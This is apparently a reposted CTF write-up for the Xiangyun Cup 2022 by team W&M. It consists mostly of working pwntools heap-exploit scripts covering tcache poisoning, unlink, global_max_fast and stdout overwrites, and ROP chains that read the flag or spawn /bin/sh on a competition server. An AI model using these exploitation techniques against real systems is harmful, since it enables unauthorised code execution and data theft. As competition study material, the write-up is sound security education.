    return ptr_0 | ptr_1 | ptr_2 | ptr_3

context.log_level = "debug"
# add('0' * 0x800)
add("6" * 0x800)
add("0" * 8)
show(str(0x3030303030303030))
libc_base = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00')) - 0x21a330
log.success("libc_base:\\t" + hex(libc_base))

add("0" * 0x20)
add("2" * 0x8)
add("5" * 0x20)
add("4" * 0x20)
add("0" * 0x20)
delete(str(0x3535353535353535))
delete(str(0x3636363636363636))

add("0" * 0x20)
add("1" * 0x20)
add("3" * 8)

delete(str(0x3131313131313131))

show(str(0x3232323232323232))
heap_leak = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00'))
log.success("heap_leak:\\t" + hex(heap_leak))

heap_base = deprotect(heap_leak) - 0x12840
log.success("heap_base:\\t" + hex(heap_base))

std_Init = libc_base + 0x3e58f0

environ = libc_base + 0x221200

cpp_fflush = libc_base + 0x554260
system_addr = libc_base + 0x50d60
cerr = libc_base + 0x556420

edit(str(0x3232323232323232), p64((cerr - 0x10) ^ ((heap_base + 0x127d0) >> 12)))
add("9" * 8)
add('a' * 0x10 + '/bin/sh\\x00')

delete(str(0x3939393939393939))

edit(str(0x3333333333333333), p64((cpp_fflush) ^ ((heap_base + 0x127d0) >> 12)))
add('k' * 8)
add(p64(system_addr))

sh.interactive()

bitheap

Edit 功能可以有一个位的溢出,可以覆盖下个堆块的 prev_inuse,可泄露堆地址的 off by null

from pwn import *

context.log_level = "debug"
context.arch = "amd64"
sh = remote('101.201.71.136', 33358)
#sh = process(['./bitheap'])

def choice(idx):
    sh.sendlineafter("choice: ", str(idx))

def add(idx, size):
    choice(1)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Size: ", str(size))

def edit(idx, content, tag=False):
    choice(2)
    sh.sendlineafter("Index: ", str(idx))

    send_content = ""
    for i in content:
        send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
    if tag:
        send_content += '0'
    sh.sendafter("Content: ", send_content)

def show(idx):
    choice(3)
    sh.sendlineafter("Index: ", str(idx))

def delete(idx):
    choice(4)
    sh.sendlineafter("Index: ", str(idx))

add(0, 0x88)
add(1, 0x88)

for i in range(2, 2 + 7):
    add(i, 0x88)

delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
heap_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x260
log.success("heap_base:\\t" + hex(heap_base))

fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, '\\x00') + p64(0x90)
edit(1, chunk_data, True)
for i in range(2, 2 + 7):
    delete(i)

delete(0)

for i in range(2, 2 + 7):
    add(i, 0x88)

add(0, 0x88)
show(1)
libc_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))

pop_rdi_addr = libc_base + 0x2164f
pop_rsi_addr = libc_base + 0x23a6a
pop_rdx_addr = libc_base + 0x1b96
pop_rax_addr = libc_base + 0x1b500
syscall_addr = libc_base + 0xd2625
free_hook_addr = libc_base + 0x3ed8e8
environ = libc_base + 0x3ee098
gets_addr = libc_base + 0x80060

add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
stack = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x120
log.success("stack:\\t" + hex(stack))

delete(2)
delete(9)

edit(1, p64(stack - 0x18))

add(9, 0x88)
add(2, 0x88)

start_addr = stack - 0x18
rop_chain1 = flat([
    pop_rdi_addr,
    0,
    pop_rsi_addr,
    stack,
    pop_rdx_addr,
    0x200,
    syscall_addr,
])

rop_chain2 = flat([
    pop_rdi_addr,
    start_addr,
    pop_rsi_addr,
    0,
    pop_rax_addr,  # sys_open('flag', 0)
    2,
    syscall_addr,
    pop_rax_addr,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi_addr,
    3,
    pop_rsi_addr,
    start_addr + 0x200,
    pop_rdx_addr,
    0x100,
    syscall_addr,
    pop_rax_addr,  # sys_write(1, heap, 0x100)
    1,
    pop_rdi_addr,
    1,
    pop_rsi_addr,
    start_addr + 0x200,
    syscall_addr
])

#gdb.attach(sh, "b *$rebase(0x0000000000000EA7)")
content = 'flag'.ljust(0x18, '\\x00') + rop_chain1
sh.sendline(str(2))
sh.sendlineafter("Index: ", str(2))

send_content = ""
for i in content:
    send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
sh.sendafter("Content: ", send_content)
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)

sh.interactive()

leak

解题思路见 VNCTF 2022 HideOnHeap 这题

# encoding: utf-8
from pwn import *

elf = None
libc = None
file_name = "./leak"
context.timeout = 1

def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary

def get_libc(dic=""):
    if context.binary == None:
        context.binary = dic + file_name
    assert isinstance(context.binary, ELF)
    libc = None
    for lib in context.binary.libs:
        if '/libc.' in lib or '/libc-' in lib:
            libc = ELF(lib, checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], int(sys.argv[2]), sys.argv[4])
            return s.process([file_name])
        else:
            if ":" in sys.argv[1]:
                r = sys.argv[1].split(':')
                return remote(r[0], int(r[1]))
            return remote(sys.argv[1], int(sys.argv[2]))
    else:
        return process([file_name])

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        if info == None:
            info = 'libc_base:\\t'
        return_address = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    try:
        sh.recvrepeat(0.1)
        sh.sendline('cat flag')
        return sh.recvrepeat(0.3)
    except EOFError:
        return ""

def get_gdb(sh, addr=None, gdbscript=None, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript)
    elif addr is not None:
        gdb.attach(sh, 'b *$rebase(' + hex(addr) + ")")
    else:
        gdb.attach(sh)
    if stop:
        pause()

def Attack(target=None, elf=None, libc=None):
    global sh
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 30:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            sh.close()
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def choice(idx):
    sh.sendlineafter("choice: ", str(idx))

def add(idx, size):
    choice(1)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Size: ", str(size))

def edit(idx, content):
    choice(2)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendafter("Content: ", str(content))

def delete(idx):
    choice(3)
    sh.sendlineafter("Index: ", str(idx))

def pwn(sh, elf, libc):
    context.log_level = "debug"
    delta = 0xb30
    size = (delta * 2) + 0x20
    alloc_size = size - 0x10
    add(0, alloc_size)
    add(1, alloc_size + 0x10)
    add(2, alloc_size + 0x20)

    add(3, 0x80)
    add(4, 0x80)
    add(5, 0x80)
    for i in range(8):
        edit(4, p64(0) * 2)
        delete(4)

    delete(3)
    edit(4, '\\x40\\xf9')
    add(6, 0x80)
    add(7, 0x80)  # global_max_fast
    add(8, 0x110)  # clear unsortedbin

    for i in range(3):
        edit(4, p64(0) * 2)
        delete(4)
    edit(4, '\\x60\\xe7')

    add(9, 0x80)
    add(10, 0x80)  # stdout
    edit(7, '\\xff' * 8)

    delete(0)
    delete(1)
    delete(2)
    edit(10, p64(0xfbad1800) + '\\x00' * 0x19)
    choice(6)
    # gdb.attach(sh, "b free")
    # delete(0)

    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(elf=get_file(), libc=get_libc())
    sh.close()
    if flag != "":
        log.success('The flag is ' + re.search(r'flag{.+}', flag).group())

FROM : wm-team.cn

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月13日22:18:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   祥云杯 2022 By W&Mhttps://cn-sec.com/archives/3165558.html

发表评论

匿名网友 填写信息